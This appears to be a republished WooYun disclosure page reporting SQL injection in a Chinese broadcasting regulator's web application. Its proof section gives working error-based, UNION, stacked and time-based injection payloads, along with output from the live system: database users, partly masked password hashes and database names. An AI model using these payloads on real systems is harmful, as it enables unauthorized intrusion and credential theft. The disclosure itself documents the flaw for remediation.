国家广电局存在SQL注射漏洞影响大量数据

2015年6月23日21:58:56评论214 views字数 229阅读0分45秒阅读模式

摘要

2014-09-26：细节已通知厂商并且等待厂商处理中
2014-09-28：厂商已经确认，细节仅向厂商公开
2014-10-08：细节向核心白帽子及相关领域专家公开
2014-10-18：细节向普通白帽子公开
2014-10-28：细节向实习白帽子公开
2014-11-08：细节向公众公开

漏洞概要关注数(7) 关注此漏洞

缺陷编号： WooYun-2014-77199

漏洞标题：国家广电局存在SQL注射漏洞影响大量数据

漏洞作者：紫霞仙子

提交时间： 2014-09-26 20:08

公开时间： 2014-11-08 20:10

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：注射技巧

1人收藏

漏洞详情

披露状态：

简要描述：

路过广电局！

详细说明：

具体情况看链接：

http://**.**.**.**/wszb/filemanage/ajaxGetDepartList.aspx?departcode=

直接测试。

漏洞证明：

code 区域

Place: GET
 Parameter: departcode
     Type: error-based
     Payload: departcode=' AND 5347=CONVERT(INT,(SELECT CHAR(113)+CHAR(119)+CHAR(
 114)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (5347=5347) THEN CHAR(49) ELSE CHAR(
 48) END))+CHAR(113)+CHAR(106)+CHAR(97)+CHAR(109)+CHAR(113))) AND 'niTr'='niTr
 
     Type: UNION query
     Title: Generic UNION query (NULL) - 2 columns
     Payload: departcode=' UNION ALL SELECT CHAR(113)+CHAR(119)+CHAR(114)+CHAR(11
 3)+CHAR(113)+CHAR(112)+CHAR(68)+CHAR(103)+CHAR(74)+CHAR(89)+CHAR(79)+CHAR(73)+CH
 AR(76)+CHAR(68)+CHAR(81)+CHAR(113)+CHAR(106)+CHAR(97)+CHAR(109)+CHAR(113),NULL--
 
 
     Type: stacked queries
     Payload: departcode='; WAITFOR DELAY '0:0:5'--
 
     Type: AND/OR time-based blind
     Payload: departcode=' WAITFOR DELAY '0:0:5'--
 ---
 
 web server operating system: Windows 2008 R2 or 7
 web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
 back-end DBMS: **
 database management system users [2]:
 [*] jcsywg**
 [*] jcywgd**
 
 [*] jcs** [1]:
     password hash: 0x01004086ceb6fc7c56****7157fa17ed2857cb87715d802b
         header: 0x0100
         salt: 408**b6
         mixedcase: fc7c56390***17ed2857cb87715d802b
 
 [*] jc** [1]:
     password hash: 0x0100a14cfee38***d5406f1cecf83246f09bf45a
         header: 0x0100
         salt: a14cf*3
         mixedcase: 86469c3aba6095***06f1cecf83246f09bf45a
 
 available databases [17]:
 [*] ChinaS*ap
 [*] Chin*InfoFaBu
 [*] data
 [*] jc*
 [*] jcy*0
 [*] jcy*1
 [*] jcy**
 [*] jc*1216
 [*] jcy**326
 [*] jcy*
 [*] jcy*
 [*] kjds*f
 [*] master
 [*] model
 [*] msdb
 [*] SarftS*e1
 [*] tempdb

修复方案：

没敢深入，勿请喝茶。

版权声明：转载请注明来源紫霞仙子@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2014-09-28 11:11

厂商回复：

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-09-24 20:51 | Moo ( 路人 | Rank:8 漏洞数:3 | PS：不打脸，还要泡妞呢)

0

伙计你要暴富了

1# 回复此人
2014-09-25 10:15 | r3nty ( 路人 | Rank:17 漏洞数:4 )

0

开门送温暖

2# 回复此人
2014-11-08 20:13 | 我爱，你老婆 ( 实习白帽子 | Rank:45 漏洞数:15 | 猥琐的猥琐！)

0

前排留名

3# 回复此人

漏洞概要 关注数(7) 关注此漏洞

缺陷编号： WooYun-2014-77199

漏洞标题： 国家广电局存在SQL注射漏洞影响大量数据

相关厂商： 国家广电局

漏洞作者： 紫霞仙子

提交时间： 2014-09-26 20:08

公开时间： 2014-11-08 20:10

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 15

漏洞状态： 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 注射技巧

1人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 紫霞仙子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(7) 关注此漏洞

漏洞标题：国家广电局存在SQL注射漏洞影响大量数据

相关厂商：国家广电局

漏洞作者：紫霞仙子

危害等级：高

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：注射技巧

版权声明：转载请注明来源紫霞仙子@乌云

漏洞评价(共0人评价):

登陆后才能进行评分